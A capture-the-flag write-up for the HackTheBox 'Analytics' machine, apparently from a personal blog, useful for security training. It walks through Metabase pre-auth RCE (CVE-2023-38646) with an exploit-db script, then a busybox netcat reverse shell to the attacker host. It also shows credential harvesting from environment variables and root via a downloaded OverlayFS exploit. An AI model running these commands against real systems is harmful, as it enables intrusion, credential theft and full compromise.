WriteupsHTB — Analytics
WebEasyLinux
HTB — Analytics
Metabase pre-auth RCE CVE-2023-38646 via setup token SSRF for shell. Ubuntu OverlayFS CVE-2023-2640 local privilege escalation for root.
January 18, 2025HackTheBox
#Metabase#CVE-2023-38646#OverlayFS#SSRF
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-18 20:24 EST
Nmap scan report for analytical.htb (10.10.11.233)
Host is up (0.022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Analytical
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/18%OT=22%CT=1%CU=33570%PV=Y%DS=2%DC=T%G=Y%TM=678C
OS:5473%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 22.10 ms 10.10.14.1
2 22.31 ms analytical.htb (10.10.11.233)metabase
sh
curl http://data.analytical.htb/auth/login?redirect=%2F | grep 'version'sh
,"version":{"date":"2023-06-29","tag":"v0.46.6"Metabase 0.46.6 - Pre-Auth Remote Code Execution
- https://www.exploit-db.com/exploits/51797
sh
python3 51797.py -l 10.10.14.6 -p 1234 -P 80 -u http://data.analytical.htb/
[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]
[*] Retriving setup token
[+] Setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
[*] Tesing if metabase is vulnerable
[+] Starting http server on port 80
[+] Metabase version seems exploitable
[+] Exploiting the server
metabase_shell > whoami
metabasesh
metabase_shell > busybox nc 10.10.14.6 1235 -e /bin/bashsh
nc -lnvp 1235
listening on [any] 1235 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.233] 37951
whoami
metabasesh
ls
app
bin
dev
etc
home
lib
media
metabase.dbsh
╔══════════╣ Unexpected in root
/app
/metabase.db
/.dockerenv
/pluginssh
══╣ Breakout via mounts
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts
═╣ /proc mounted? ................. Yesenvironment variables
sh
env
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=3551e9fd153d
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/metabase.db
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=5
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/usr/bin/env
OLDPWD=/creds
metalytics:An4lytics_ds20223#
ssh as metalytics
sh
ssh metalytics@10.10.11.233
The authenticity of host '10.10.11.233 (10.10.11.233)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:174: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.233' (ED25519) to the list of known hosts.
metalytics@10.10.11.233's password: An4lytics_ds20223#user.txt
sh
metalytics@analytics:~$ cat user.txt
4a71142a...priv esc
sh
metalytics@analytics:/$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linuxsh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN - GameOver(lay) Ubuntu Privilege Escalation
- https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
sh
wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/refs/heads/main/exploit.shsh
metalytics@analytics:~$ wget http://10.10.14.6:8000/exploit.shsh
metalytics@analytics:~$ chmod +x exploit.sh
metalytics@analytics:~$ ./exploit.sh
[+] You should be root now
[+] Type 'exit' to finish and leave the house cleaned
root@analytics:~# whoami
rootsh
root@analytics:/root# cat root.txt
13cbf3e4...Up next
HardJan 2025
HTB — Backfire
HardHat C2 framework exposed via reverse proxy misconfiguration. JWT forgery for admin access, Sliver C2 implant exploitation for lateral movement.
Read writeup
EasyJan 2025
HTB — Broker
Apache ActiveMQ CVE-2023-46604 unauthenticated RCE via ClassInfo deserialization. Sudo nginx misconfiguration for arbitrary file read and root access.
Read writeup
EasyJan 2025
HTB — OpenAdmin
OpenNetAdmin 18.1.1 RCE via command injection in web console. Internal Apache vhost with SSH key in password-protected page for lateral movement.
Read writeup